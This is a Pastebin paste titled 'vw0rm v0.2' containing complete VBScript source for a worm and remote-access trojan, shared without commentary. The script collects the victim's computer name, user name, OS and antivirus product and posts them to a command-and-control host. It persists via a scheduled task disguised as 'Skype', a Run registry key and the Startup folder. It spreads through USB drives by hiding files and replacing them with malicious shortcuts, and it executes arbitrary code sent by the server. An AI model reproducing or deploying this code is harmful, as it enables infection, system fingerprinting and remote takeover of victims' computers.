SHARE
TWEET

vw0rm v0.2

fafanana Nov 19th, 2019 1,057 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. On error resume next
  2.  
  3. j = array("WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP")
  4. g = array("HKCU","HKLM","HKCU\vw0rm","\Software\Microsoft\Windows\CurrentVersion\Run\","HKLM\SOFTWARE\Classes\","REG_SZ","\defaulticon\")
  5. y= array("winmgmts:","win32_logicaldisk","Win32_OperatingSystem","winmgmts:\\localhost\root\securitycenter","AntiVirusProduct")
  6.  
  7. function go(m)
  8. if m=4 then
  9. T="winmgmts:\\localhost\root\securitycenter"
  10. Set B=GetObject(y(3)).InstancesOf(y(4))
  11. for each a in b
  12. go=a.displayName
  13. exit for
  14. next
  15. Set B=GetObject(y(3) & "2").InstancesOf(y(4))
  16. for each a in b
  17. go=a.displayName
  18. exit for
  19. next
  20. if go="" then go="Not-found"
  21. else
  22. Set B=GetObject(y(0)).InstancesOf(y(m))
  23. for each a in b
  24. if m = 1 then
  25. go=a.volumeserialnumber
  26. elseif m = 2 then
  27. go=a.caption
  28. end if
  29. exit for
  30. next
  31. end if
  32. end function
  33.  
  34. set w = WScript
  35. set sh = Cr(0)
  36. set fs = Cr(1)
  37.  
  38. Function Cr(N)
  39. Set Cr = CreateObject(j(N))
  40. End Function
  41.  
  42. function Ex(s)
  43. Ex = sh.ExpandEnvironmentStrings("%"&s&"%")
  44. end function
  45.  
  46. function Pt(C,A)
  47. Pt=""
  48. Set X=Cr(3)
  49. X.Open "POST","http://sandboxupdate.myq-see.com:3008/"&C,false
  50. X.setrequestheader "User-Agent:",nf
  51. X.send A
  52. Pt=X.responsetext
  53. end function
  54.  
  55. Function nf
  56. nf=""
  57. i=go(1)
  58. s=VN & "_" & i
  59. nf=nf&s&c
  60. s=ex("COMPUTERNAME")
  61. nf=nf&s&c
  62. s=ex("USERNAME")
  63. nf=nf&s&c
  64. s=go(2)
  65. nf=nf&s&c
  66. s=go(4)
  67. nf=nf&s&c&c&nt&c&u&c
  68. End Function
  69.  
  70. Sub Ns
  71. on error resume next
  72. dr=ex("AppData") & C & wn
  73. fs.CopyFile fu,dr,true
  74. sh.run "schtasks /create /sc minute /mo 1 /tn Skype /tr " & ChrW(34) & dr,false
  75. sh.regwrite g(0) & g(3) & "IMIFCAJ1A7", Ch & dr & Ch, g(5)
  76. fs.copyfile fu, Cr(2).NameSpace(&H7).Self.Path &C & wn ,true
  77. end Sub
  78.  
  79. dr=ex("AppData") & C & wn
  80.  
  81. sub spr
  82. on error resume next
  83. for each dr in fs.drives
  84. dp=dr.path & c
  85. if dr.isready = true then
  86. if dr.drivetype = 1 then
  87. fs.copyfile fu,dp & wn,true
  88. if fs.fileexists(dp & wn) then
  89. fs.getfile(dp & wn).attributes=2+4
  90. end if
  91. for each fi in fs.getfolder(dp).files
  92. if instr(fi.name,".") then
  93. if lcase(split(fi.name,".") (ubound(split(fi.name,".")))) <>"lnk" then
  94. fi.attributes=2+4
  95. if ucase(fi.name) <> ucase(wn) then
  96. with sh.createshortcut(dp  & split(fi.name,".")(0) & ".lnk")
  97. .windowstyle = 7
  98. .targetpath = "cmd.exe"
  99. .arguments = "/c start " & replace(wn," ", ch & " " & ch) & "&start " & replace(fi.name," ", ch & " " & ch) &"&exit"
  100. fic = sh.regread(g(4) & sh.regread(g(4) & "." & split(fi.name, ".")(ubound(split(fi.name, ".")))& c) & g(6))
  101. if instr(iconlocation,",") = 0 then
  102. .iconlocation = fi.path
  103. else
  104. .iconlocation = fic
  105.  end if
  106. .save()
  107. end with
  108. end if
  109. end if
  110. end if
  111. next
  112. for each fo in fs.getfolder(dp).subfolders
  113. fo.attributes=2+4
  114. with sh.createshortcut(dp & fo.name & ".lnk")
  115. .windowstyle=7
  116. .targetpath="cmd.exe"
  117. .arguments="/c start " & replace(wn," ", ch & " " & ch) & "&start explorer " & replace(fo.name," ", ch & " " & ch) &"&exit"
  118. fic=sh.regread("HKLM\software\classes\folder" & g(6))
  119. if instr(.iconlocation,",")=0 then
  120. .iconlocation=fo.path
  121. else
  122. .iconlocation=fic
  123. end if
  124. .save()
  125. end with
  126. next
  127. end if
  128. end if
  129. next
  130. err.clear
  131. end sub
  132.  
  133.  
  134.  
  135. vn="vw0rm"
  136. U=""
  137.  
  138. ch = chrw(34)
  139. c = chrw(92)
  140. fu = w.scriptfullname
  141. wn=w.scriptname
  142. NT="No"
  143. if fs.fileexists(ex("Windir") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
  144. NT="Yes"
  145. end if
  146.  
  147. U= sh.regread(g(2))
  148. if U="" then
  149. if mid(fu,2)=":\" & wn then
  150. U="TRUE"
  151. sh.regwrite g(2), U, g(5)
  152. else
  153. U="FALSE"
  154. sh.regwrite g(2), U, g(5)
  155. end if
  156. end if
  157.  
  158. Ns
  159. spl="|V|"
  160. while true
  161. s=split(Pt("Vre",""),spl)
  162. select case s(0)
  163. case "exc"
  164. sa= s(1)
  165. execute sa
  166. case "Sc"
  167. s2 = Ex("temp") & "\" & s(2)
  168. set wr = fs.OpenTextFile(s2,2,True)
  169. wr.Write s(1)
  170. wr.Close()
  171. sh.run s2, 6
  172. case "RF"
  173. s2 = Ex("temp") & "\" & s(2)
  174. set wr = fs.OpenTextFile(s2,2,True)
  175. wr.Write s(1)
  176. wr.Close()
  177. sh.run s2
  178. case "Ren"
  179. set wr = fs.OpenTextFile(fu,1)
  180. f = wr.ReadAll
  181. wr.close()
  182. f = replace(f,ch&vn&ch,ch&s(1)&ch)
  183. set wr = fs.OpenTextFile(fu,2,false)
  184. wr.Write f
  185. wr.close()
  186. case "Up"
  187. set wr = fs.OpenTextFile(fu,2,false)
  188. s(1) = replace(s(1),"|U|","|V|")
  189. wr.Write s(1)
  190. wr.Close()
  191. sh.run "wscript.exe //B " & ch & fu & ch, 6
  192. w.quit
  193. case "Cl"
  194. W.quit
  195. case "Un"
  196. S(1) = replace(S(1),"%f",fu)
  197. S(1) = replace(S(1),"%n",wn)
  198. S(1) = replace(S(1),"%sfdr",dr)
  199. execute S(1)
  200. w.quit
  201. end select
  202. W.Sleep 6000
  203. Spr
  204. wend
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top